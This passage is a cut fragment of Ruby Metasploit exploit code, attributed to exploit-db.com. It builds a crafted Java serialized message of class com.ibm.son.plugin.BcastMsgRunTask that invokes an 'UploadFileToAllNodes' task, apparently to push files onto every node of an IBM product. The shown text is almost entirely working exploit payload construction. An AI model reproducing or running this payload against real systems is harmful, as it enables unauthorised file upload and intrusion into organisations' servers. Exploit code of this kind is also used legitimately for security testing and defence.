  task_arg_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/io/Serializable;")
  # Declare int field 'forwardGatheredDataPipelinePeriod'
  forward_gather_field = Rex::Java::Serialization::Model::Field.new
  forward_gather_field.type = 'int'
  forward_gather_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'forwardGatheredDataPipelinePeriod')
  # Create the class description
  msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
  msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.BcastMsgRunTask')
  msg_class_desc.serial_version = 1
  # 0x02 is SC_SERIALIZABLE in the Java serialization protocol
  msg_class_desc.flags = 2
  msg_class_desc.fields = []
  # Field order here matches the value order below
  msg_class_desc.fields << forward_gather_field
  msg_class_desc.fields << out_int_field
  msg_class_desc.fields << task_field
  msg_class_desc.fields << task_arg_field
  # Add annotations
  msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
  msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
  # Add superclass
  msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
  msg_class_desc.super_class.description = msg_obj
  # Set the member values: forwardGatheredDataPipelinePeriod = 0,
  # outputGatherInterval = 1, then the task name and its argument
  obj.class_data << ['int', 0]
  obj.class_data << ['int', 1]
  obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileToAllNodes')
  obj.class_data << upfile_arg_obj
  msg_class_desc
end
end
- Источник
- www.exploit-db.com